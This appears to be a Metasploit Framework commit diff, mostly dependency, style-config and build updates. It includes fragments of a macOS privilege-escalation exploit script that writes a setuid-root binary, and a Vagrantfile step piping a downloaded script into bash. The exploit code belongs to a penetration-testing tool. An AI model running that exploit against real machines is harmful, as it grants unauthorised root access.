automatic module_metadata_base.json update

Land #12008 , struts2_content_type_ognl 302 fix
Don't worry about response code
2019-06-24 23:05:38 -07:00 · 2019-06-25 00:40:58 -05:00 · 2019-06-24 13:53:31 -05:00 · 2019-06-22 00:52:07 -07:00 · 2019-06-22 02:34:14 -05:00 · 2019-06-20 10:05:48 -07:00
810 changed files with 191917 additions and 16394 deletions
@@ -9,7 +9,7 @@
 # inherit_from: .rubocop_todo.yml

 AllCops:
-  TargetRubyVersion: 2.2
+  TargetRubyVersion: 2.4

 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
@@ -45,6 +45,10 @@ Style/RedundantReturn:
  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
  Enabled: false

+Naming/VariableNumber:
+  Description: 'To make it easier to use reference code, disable this cop'
+  Enabled: false
+
 Style/NumericPredicate:
  Description: 'This adds no efficiency nor space saving'
  Enabled: false
@@ -55,14 +59,18 @@ Style/Documentation:
  Exclude:
    - 'modules/**/*'

-Layout/IndentHeredoc:
+Layout/SpaceInsideArrayLiteralBrackets:
  Enabled: false
-  Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
+  Description: 'Almost all module metadata have space in brackets'

 Style/GuardClause:
  Enabled: false
  Description: 'This often introduces bugs in tested code'

+Style/EmptyLiteral:
+  Enabled: false
+  Description: 'This looks awkward when you mix empty and non-empty literals'
+
 Style/NegatedIf:
  Enabled: false
  Description: 'This often introduces bugs in tested code'
@@ -72,9 +80,16 @@ Style/ConditionalAssignment:
  Description: 'This is confusing for folks coming from other languages'

 Style/Encoding:
-  Enabled: true
  Description: 'We prefer binary to UTF-8.'
-  EnforcedStyle: 'when_needed'
+  Enabled: false
+
+Style/ParenthesesAroundCondition:
+  Enabled: false
+  Description: 'This is used in too many places to discount, especially in ported code. Has little effect'
+
+Style/TrailingCommaInArrayLiteral:
+  Enabled: false
+  Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'

 Metrics/LineLength:
  Description: >-
@@ -83,6 +98,13 @@ Metrics/LineLength:
  Enabled: true
  Max: 180

+Metrics/BlockLength:
+  Enabled: true
+  Description: >-
+                  While the style guide suggests 10 lines, exploit definitions
+                  often exceed 200 lines.
+  Max: 300
+
 Metrics/MethodLength:
  Enabled: true
  Description: >-
@@ -90,10 +112,10 @@ Metrics/MethodLength:
                  often exceed 200 lines.
  Max: 300

-# Basically everything in metasploit needs binary encoding, not UTF-8.
-# Disable this here and enforce it through msftidy
-Style/Encoding:
-  Enabled: false
+Naming/UncommunicativeMethodParamName:
+  Enabled: true
+  Description: 'Whoever made this requirement never looked at crypto methods, IV'
+  MinNameLength: 2

 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
@@ -104,11 +126,31 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

+Layout/AlignHash:
+  Enabled: false
+  Description: 'aligning info hashes to match these rules is almost impossible to get right'
+
+Layout/EmptyLines:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundClassBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundMethodBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
 Layout/AlignParameters:
  Enabled: true
  EnforcedStyle: 'with_fixed_indentation'
  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'

+Style/For:
+  Enabled: false
+  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'
+
 Style/StringLiterals:
  Enabled: false
  Description: 'Single vs double quote fights are largely unproductive.'
@@ -1 +1 @@
-2.5.3
+2.6.2
@@ -11,23 +11,18 @@ addons:
      - graphviz
 language: ruby
 rvm:
-  - '2.3.8'
-  - '2.4.5'
-  - '2.5.3'
+  - '2.5.5'
+  - '2.6.2'

 env:
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
  # Used for testing the remote data service
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1'

 matrix:
  fast_finish: true
-  exclude:
-  - rvm: '2.3.8'
-    env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
-  - rvm: '2.4.5'
-    env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'

 jobs:
  # build docker image
@@ -20,12 +20,15 @@ it into Metasploit's master branch.  If you do not care to follow these rules, y
 * **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** follow the [50/72 rule] for Git commit messages.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master` to preserve the
-  history of your pull request.  See [PR#8000] for an example of losing commit history as soon as
-  you update your own master branch.
+* **Do** create a [topic branch] to work on instead of working directly on `master`.
+  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
+  allows for a location for more commits to be offered without mingling with other contributor changes,
+  and allows contributors to make progress while a PR is still being reviewed.
+

 ### Pull Requests

+* **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
@@ -84,7 +87,7 @@ curve, so keep it up!
 [Rubocop]:https://rubygems.org/search?query=rubocop
 [50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
 [topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
-[PR#8000]:https://github.com/rapid7/metasploit-framework/pull/8000
+[draft PR]:https://help.github.com/en/articles/about-pull-requests#draft-pull-requests
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
@@ -1,4 +1,4 @@
-FROM ruby:2.5.3-alpine3.7 AS builder
+FROM ruby:2.6.2-alpine3.9 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@@ -16,7 +16,7 @@ RUN apk add --no-cache \
      bison \
      build-base \
      ruby-dev \
-      libressl-dev \
+      openssl-dev \
      readline-dev \
      sqlite-dev \
      postgresql-dev \
@@ -29,7 +29,6 @@ RUN apk add --no-cache \
      git \
    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
    && gem update --system \
-    && gem install bundler \
    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
@@ -37,7 +36,7 @@ RUN apk add --no-cache \
    && chmod -R a+r /usr/local/bundle


-FROM ruby:2.5.3-alpine3.7
+FROM ruby:2.6.2-alpine3.9
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -3,6 +3,8 @@ source 'https://rubygems.org'
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
 gemspec name: 'metasploit-framework'

+gem 'sqlite3', '~>1.3.0'
+
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.3)
+    metasploit-framework (5.0.31)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -21,9 +21,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.3.58)
-      metasploit_data_models
-      metasploit_payloads-mettle (= 0.5.4)
+      metasploit-payloads (= 1.3.70)
+      metasploit_data_models (= 3.0.10)
+      metasploit_payloads-mettle (= 0.5.16)
      mqtt
      msgpack
      nessus_rest
@@ -38,7 +38,7 @@ PATH
      patch_finder
      pcaprub
      pdf-reader
-      pg (= 0.20.0)
+      pg (~> 0.20)
      railties
      rb-readline
      recog
@@ -80,40 +80,40 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.0.3)
-    actionpack (4.2.11)
-      actionview (= 4.2.11)
-      activesupport (= 4.2.11)
+    actionpack (4.2.11.1)
+      actionview (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.11)
-      activesupport (= 4.2.11)
+    actionview (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.11)
-      activesupport (= 4.2.11)
+    activemodel (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
-    activerecord (4.2.11)
-      activemodel (= 4.2.11)
-      activesupport (= 4.2.11)
+    activerecord (4.2.11.1)
+      activemodel (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      arel (~> 6.0)
-    activesupport (4.2.11)
+    activesupport (4.2.11.1)
      i18n (~> 0.7)
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
-    addressable (2.5.2)
+    addressable (2.6.0)
      public_suffix (>= 2.0.2, < 4.0)
    afm (0.2.2)
    arel (6.0.4)
-    arel-helpers (2.8.0)
-      activerecord (>= 3.1.0, < 6)
-    backports (3.11.4)
-    bcrypt (3.1.12)
-    bcrypt_pbkdf (1.0.0)
+    arel-helpers (2.9.1)
+      activerecord (>= 3.1.0, < 7)
+    backports (3.15.0)
+    bcrypt (3.1.13)
+    bcrypt_pbkdf (1.0.1)
    bindata (2.4.4)
    bit-struct (0.16)
    builder (3.2.3)
@@ -125,7 +125,7 @@ GEM
    diff-lcs (1.3)
    dnsruby (1.61.2)
      addressable (~> 2.5)
-    docile (1.3.1)
+    docile (1.3.2)
    ed25519 (1.2.4)
    em-http-request (1.1.5)
      addressable (>= 2.3.4)
@@ -135,15 +135,21 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
+    equatable (0.6.0)
    erubis (2.7.0)
    eventmachine (1.2.7)
-    factory_bot (4.11.1)
-      activesupport (>= 3.0.0)
-    factory_bot_rails (4.11.1)
-      factory_bot (~> 4.11.1)
-      railties (>= 3.0.0)
-    faker (1.9.1)
+    factory_bot (5.0.2)
+      activesupport (>= 4.2.0)
+    factory_bot_rails (5.0.2)
+      factory_bot (~> 5.0.2)
+      railties (>= 4.2.0)
+    faker (1.9.4)
      i18n (>= 0.7)
+      pastel (~> 0.7.2)
+      thor (~> 0.20.0)
+      tty-pager (~> 0.12.0)
+      tty-screen (~> 0.6.5)
+      tty-tree (~> 0.3.0)
    faraday (0.15.4)
      multipart-post (>= 1.2, < 3)
    filesize (0.2.0)
@@ -154,21 +160,21 @@ GEM
      concurrent-ruby (~> 1.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.1.0)
+    json (2.2.0)
    loofah (2.2.3)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
-    metasm (1.0.3)
+    metasm (1.0.4)
    metasploit-concern (2.0.5)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (3.0.2)
+    metasploit-credential (3.0.3)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 3.0.0)
      net-ssh
-      pg (~> 0.15)
+      pg
      railties
      rex-socket
      rubyntlm
@@ -177,36 +183,39 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.58)
-    metasploit_data_models (3.0.4)
+    metasploit-payloads (1.3.70)
+    metasploit_data_models (3.0.10)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
      metasploit-concern
      metasploit-model
-      pg (= 0.20.0)
+      pg
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.4)
+    metasploit_payloads-mettle (0.5.16)
    method_source (0.9.2)
    mini_portile2 (2.4.0)
    minitest (5.11.3)
    mqtt (0.5.0)
-    msgpack (1.2.6)
-    multipart-post (2.0.0)
+    msgpack (1.3.0)
+    multipart-post (2.1.1)
    nessus_rest (0.1.6)
-    net-ssh (5.1.0)
+    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
-    nokogiri (1.10.1)
+    nokogiri (1.10.3)
      mini_portile2 (~> 2.4.0)
-    octokit (4.13.0)
+    octokit (4.14.0)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
+    pastel (0.7.3)
+      equatable (~> 0.6)
+      tty-color (~> 0.5)
    patch_finder (1.0.2)
    pcaprub (0.13.0)
    pdf-reader (2.2.0)
@@ -215,7 +224,7 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (0.20.0)
+    pg (0.21.0)
    pg_array_parser (0.0.9)
    postgres_ext (3.0.1)
      activerecord (~> 4.0)
@@ -224,7 +233,7 @@ GEM
    pry (0.12.2)
      coderay (~> 1.1.0)
      method_source (~> 0.9.0)
-    public_suffix (3.0.3)
+    public_suffix (3.1.0)
    rack (1.6.11)
    rack-protection (1.5.5)
      rack
@@ -238,14 +247,14 @@ GEM
      rails-deprecated_sanitizer (>= 1.0.1)
    rails-html-sanitizer (1.0.4)
      loofah (~> 2.2, >= 2.2.2)
-    railties (4.2.11)
-      actionpack (= 4.2.11)
-      activesupport (= 4.2.11)
+    railties (4.2.11.1)
+      actionpack (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
    rake (12.3.2)
    rb-readline (0.5.5)
-    recog (2.1.45)
+    recog (2.3.2)
      nokogiri
    redcarpet (3.4.0)
    rex-arch (0.1.13)
@@ -261,7 +270,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.20)
+    rex-exploitation (0.1.21)
      jsobfu
      metasm
      rex-arch
@@ -274,7 +283,7 @@ GEM
      rex-arch
    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.79)
+    rex-powershell (0.1.82)
      rex-random_identifier
      rex-text
    rex-random_identifier (0.1.4)
@@ -284,7 +293,7 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.15)
+    rex-socket (0.1.17)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
@@ -299,12 +308,12 @@ GEM
      rspec-core (~> 3.8.0)
      rspec-expectations (~> 3.8.0)
      rspec-mocks (~> 3.8.0)
-    rspec-core (3.8.0)
+    rspec-core (3.8.1)
      rspec-support (~> 3.8.0)
-    rspec-expectations (3.8.2)
+    rspec-expectations (3.8.4)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.8.0)
-    rspec-mocks (3.8.0)
+    rspec-mocks (3.8.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.8.0)
    rspec-rails (3.8.2)
@@ -317,18 +326,18 @@ GEM
      rspec-support (~> 3.8.0)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.8.0)
-    ruby-macho (2.1.0)
+    rspec-support (3.8.2)
+    ruby-macho (2.2.0)
    ruby-rc4 (0.1.5)
    ruby_smb (1.0.5)
      bindata
      rubyntlm
      windows_error
    rubyntlm (0.6.2)
-    rubyzip (1.2.2)
-    sawyer (0.8.1)
-      addressable (>= 2.3.5, < 2.6)
-      faraday (~> 0.8, < 1.0)
+    rubyzip (1.2.3)
+    sawyer (0.8.2)
+      addressable (>= 2.3.5)
+      faraday (> 0.8, < 2.0)
    simplecov (0.16.1)
      docile (~> 1.1)
      json (>= 1.8, < 3)
@@ -339,7 +348,12 @@ GEM
      rack-protection (~> 1.4)
      tilt (>= 1.3, < 3)
    sqlite3 (1.3.13)
-    sshkey (1.9.0)
+    sshkey (2.0.0)
+    strings (0.1.5)
+      strings-ansi (~> 0.1)
+      unicode-display_width (~> 1.5)
+      unicode_utils (~> 1.4)
+    strings-ansi (0.1.0)
    swagger-blocks (2.0.2)
    thin (1.7.2)
      daemons (~> 1.0, >= 1.0.9)
@@ -350,10 +364,20 @@ GEM
    tilt (2.0.9)
    timecop (0.9.1)
    ttfunk (1.5.1)
+    tty-color (0.5.0)
+    tty-pager (0.12.1)
+      strings (~> 0.1.4)
+      tty-screen (~> 0.6)
+      tty-which (~> 0.4)
+    tty-screen (0.6.5)
+    tty-tree (0.3.0)
+    tty-which (0.4.1)
    tzinfo (1.2.5)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2018.9)
+    tzinfo-data (1.2019.1)
      tzinfo (>= 1.0.0)
+    unicode-display_width (1.6.0)
+    unicode_utils (1.4.0)
    warden (1.2.7)
      rack (>= 1.0)
    windows_error (0.1.2)
@@ -361,7 +385,7 @@ GEM
      activemodel (>= 4.2.7)
      activesupport (>= 4.2.7)
    xmlrpc (0.3.0)
-    yard (0.9.18)
+    yard (0.9.19)

 PLATFORMS
  ruby
@@ -377,6 +401,7 @@ DEPENDENCIES
  rspec-rails
  rspec-rerun
  simplecov
+  sqlite3 (~> 1.3.0)
  swagger-blocks
  timecop
  yard
@@ -115,6 +115,10 @@ Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_d
 Copyright: Copyright 2018 SmartBear Software
 License: Apache 2.0

+Files: data/jtr/*
+Copyright: Copyright 1996-2013 by Solar Designer
+License: GNU GPL 2.0
+
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:
@@ -1,17 +1,17 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.0.3, MIT
-actionpack, 4.2.11, MIT
-actionview, 4.2.11, MIT
-activemodel, 4.2.11, MIT
-activerecord, 4.2.11, MIT
-activesupport, 4.2.11, MIT
-addressable, 2.5.2, "Apache 2.0"
+actionpack, 4.2.11.1, MIT
+actionview, 4.2.11.1, MIT
+activemodel, 4.2.11.1, MIT
+activerecord, 4.2.11.1, MIT
+activesupport, 4.2.11.1, MIT
+addressable, 2.6.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.8.0, MIT
-backports, 3.11.4, MIT
-bcrypt, 3.1.12, MIT
-bcrypt_pbkdf, 1.0.0, MIT
+arel-helpers, 2.9.1, MIT
+backports, 3.15.0, MIT
+bcrypt, 3.1.13, MIT
+bcrypt_pbkdf, 1.0.1, MIT
 bindata, 2.4.4, ruby
 bit-struct, 0.16, ruby
 builder, 3.2.3, MIT
@@ -23,15 +23,16 @@ crass, 1.0.4, MIT
 daemons, 1.3.1, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.2, "Apache 2.0"
-docile, 1.3.1, MIT
+docile, 1.3.2, MIT
 ed25519, 1.2.4, MIT
 em-http-request, 1.1.5, MIT
 em-socksify, 0.3.2, MIT
+equatable, 0.6.0, MIT
 erubis, 2.7.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 4.11.1, MIT
-factory_bot_rails, 4.11.1, MIT
-faker, 1.9.1, MIT
+factory_bot, 5.0.2, MIT
+factory_bot_rails, 5.0.2, MIT
+faker, 1.9.4, MIT
 faraday, 0.15.4, MIT
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
@@ -39,87 +40,90 @@ hashery, 2.1.2, "Simplified BSD"
 http_parser.rb, 0.6.0, MIT
 i18n, 0.9.5, MIT
 jsobfu, 0.4.2, "New BSD"
-json, 2.1.0, ruby
+json, 2.2.0, ruby
 loofah, 2.2.3, MIT
-metasm, 1.0.3, LGPL
+metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 3.0.2, "New BSD"
-metasploit-framework, 5.0.3, "New BSD"
+metasploit-credential, 3.0.3, "New BSD"
+metasploit-framework, 5.0.31, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.58, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 3.0.4, "New BSD"
-metasploit_payloads-mettle, 0.5.1, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.70, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 3.0.10, "New BSD"
+metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
 minitest, 5.11.3, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.2.6, "Apache 2.0"
-multipart-post, 2.0.0, MIT
+msgpack, 1.3.0, "Apache 2.0"
+multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
-net-ssh, 5.1.0, MIT
+net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.1, MIT
-octokit, 4.13.0, MIT
+nokogiri, 1.10.3, MIT
+octokit, 4.14.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
+pastel, 0.7.3, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
 pdf-reader, 2.2.0, MIT
-pg, 0.20.0, "New BSD"
+pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
-public_suffix, 3.0.3, MIT
+public_suffix, 3.1.0, MIT
 rack, 1.6.11, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
 rails-html-sanitizer, 1.0.4, MIT
-railties, 4.2.11, MIT
+railties, 4.2.11.1, MIT
 rake, 12.3.2, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.1.45, unknown
+recog, 2.3.2, unknown
 redcarpet, 3.4.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.20, "New BSD"
+rex-exploitation, 0.1.21, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.79, "New BSD"
+rex-powershell, 0.1.82, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.15, "New BSD"
+rex-socket, 0.1.17, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
 rex-text, 0.2.21, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.8.0, MIT
-rspec-core, 3.8.0, MIT
-rspec-expectations, 3.8.2, MIT
-rspec-mocks, 3.8.0, MIT
+rspec-core, 3.8.1, MIT
+rspec-expectations, 3.8.4, MIT
+rspec-mocks, 3.8.1, MIT
 rspec-rails, 3.8.2, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.8.0, MIT
-ruby-macho, 2.1.0, MIT
+rspec-support, 3.8.2, MIT
+ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.0.5, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 1.2.2, "Simplified BSD"
-sawyer, 0.8.1, MIT
+rubyzip, 1.2.3, "Simplified BSD"
+sawyer, 0.8.2, MIT
 simplecov, 0.16.1, MIT
 simplecov-html, 0.10.2, MIT
 sinatra, 1.4.8, MIT
 sqlite3, 1.3.13, "New BSD"
-sshkey, 1.9.0, MIT
+sshkey, 2.0.0, MIT
+strings, 0.1.5, MIT
+strings-ansi, 0.1.0, MIT
 swagger-blocks, 2.0.2, MIT
 thin, 1.7.2, "GPLv2+, Ruby 1.8"
 thor, 0.20.3, MIT
@@ -127,10 +131,17 @@ thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.9, MIT
 timecop, 0.9.1, MIT
 ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
+tty-color, 0.5.0, MIT
+tty-pager, 0.12.1, MIT
+tty-screen, 0.6.5, MIT
+tty-tree, 0.3.0, MIT
+tty-which, 0.4.1, MIT
 tzinfo, 1.2.5, MIT
-tzinfo-data, 1.2018.9, MIT
+tzinfo-data, 1.2019.1, MIT
+unicode-display_width, 1.6.0, MIT
+unicode_utils, 1.4.0, unknown
 warden, 1.2.7, MIT
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.18, MIT
+yard, 0.9.19, MIT
@@ -31,7 +31,6 @@ Vagrant.configure(2) do |config|
  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
    "curl -L https://get.rvm.io | bash -s stable",
    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
    "mkdir -p ~/.msf4",
  ].each do |step|
@@ -22,11 +22,26 @@ unless ENV['BUNDLE_GEMFILE']
  end
 end

+# Remove bigdecimal warning - start
+# https://github.com/ruby/bigdecimal/pull/115
+# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
+# TODO: remove when upgrading from rails 4.x
+require 'bigdecimal'
+
+def BigDecimal.new(*args, **kwargs)
+  return BigDecimal(*args) if kwargs.empty?
+  BigDecimal(*args, **kwargs)
+end
+# Remove bigdecimal warning - end
+
 begin
  require 'bundler/setup'
-rescue LoadError
-  $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
-  $stderr.puts "    $ gem install bundler"
+rescue LoadError => e
+  $stderr.puts "[*] Bundler failed to load and returned this error:"
+  $stderr.puts
+  $stderr.puts "   '#{e}'"
+  $stderr.puts
+  $stderr.puts "[*] You may need to uninstall or upgrade bundler"
  exit(1)
 end

@@ -14,7 +14,7 @@ development: &pgsql
  adapter: postgresql
  database: metasploit_framework_development
  username: postgres
-  pool: 5
+  pool: 25
  timeout: 5

 # Warning: The database defined as "test" will be erased and
@@ -27,7 +27,7 @@ def use_old_api():
 args = sys.argv

 if len(args) != 3:
-    print "usage: exploit.py source_binary dest_binary_as_root"
+    print("usage: exploit.py source_binary dest_binary_as_root")
    sys.exit(-1)

 source_binary = args[1]
@@ -42,7 +42,7 @@ attr = NSMutableDictionary.alloc().init()
 attr.setValue_forKey_(04777, NSFilePosixPermissions)
 data = NSData.alloc().initWithContentsOfFile_(source_binary)

-print "will write file", dest_binary
+print("will write file", dest_binary)

 if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
@@ -68,6 +68,6 @@ else:
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)


-print "Done!"
+print("Done!")

 del pool
@@ -0,0 +1,46 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" 